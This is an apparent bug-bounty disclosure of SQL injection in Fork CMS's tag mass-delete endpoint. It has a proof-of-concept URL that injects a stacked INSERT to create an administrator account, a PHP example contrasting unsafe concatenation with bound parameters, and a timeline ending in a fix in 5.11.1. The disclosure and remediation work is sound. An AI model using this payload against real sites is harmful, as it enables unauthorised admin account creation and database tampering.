SQL Injection in forkcms/forkcms

Valid

Reported on Oct 22nd 2021


Description

When calling the URL for deleting one or more tags, the id parameter is vulnerable to SQL injection.

Proof of Concept

Call a URL like this one (as an authenticated user).

http://forkcms.site/private/de/tags/mass_action?token=n93e05rj0l&id[]=3);insert into users(email,password,is_god) values ('attacker@example.com','$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C',1);--+&action=delete

After calling this URL, the users table has a new entry.

Impact

An attacker can tamper with data in the database at will.
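As an added example (not Fork CMS's own code), the unsafe query-building pattern the report describes, next to a hardened handler that validates and binds the ids; the tags table, the function names and the $pdo connection are assumptions:

```php
<?php
// Added example, not Fork CMS code. Assumes a PDO connection $pdo to MySQL and a
// hypothetical `tags` table; names are illustrative only.

// Vulnerable pattern: request values are concatenated straight into the statement.
// An id such as "3);insert into users(...) values (...);--" closes the IN (...) list
// and becomes a second statement when the driver permits stacked queries.
function buildDeleteTagsQueryUnsafe(array $ids): string
{
    return 'DELETE FROM tags WHERE id IN (' . implode(',', $ids) . ')';
}

// Hardened form, step 1: accept only positive decimal integers and cast them.
// The payload quoted above is rejected here before any SQL is assembled.
function validateIds(array $rawIds): array
{
    $ids = [];
    foreach ($rawIds as $raw) {
        if (!is_int($raw) && !is_string($raw)) {
            throw new InvalidArgumentException('id must be a scalar');
        }
        if (!preg_match('/^[1-9][0-9]*$/', (string) $raw)) {
            throw new InvalidArgumentException('id must be a positive integer');
        }
        $ids[] = (int) $raw;
    }
    return $ids;
}

// Hardened form, step 2: one placeholder per id, each bound as an integer, so the
// values are never interpreted as SQL regardless of driver settings.
function deleteTags(PDO $pdo, array $rawIds): int
{
    $ids = validateIds($rawIds);
    if ($ids === []) {
        return 0;
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare('DELETE FROM tags WHERE id IN (' . $placeholders . ')');
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->rowCount();
}

// Additionally, disabling emulated prepares makes MySQL bind parameters server-side:
// $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
```

Calling deleteTags($pdo, $_GET['id'] ?? []) with the report's id[] value throws before any query runs, which is also a useful place to log the rejected input for detection.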

We have contacted a member of the forkcms team and are waiting to hear back 2 years ago
We have sent a follow up to the forkcms team. We will try again in 7 days. 2 years ago
Jelmer Prins validated this vulnerability 2 years ago
kstarkloff has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins marked this as fixed in 5.11.1 with commit 0226a2 2 years ago
Jelmer Prins has been awarded the fix bounty
This vulnerability will not receive a CVE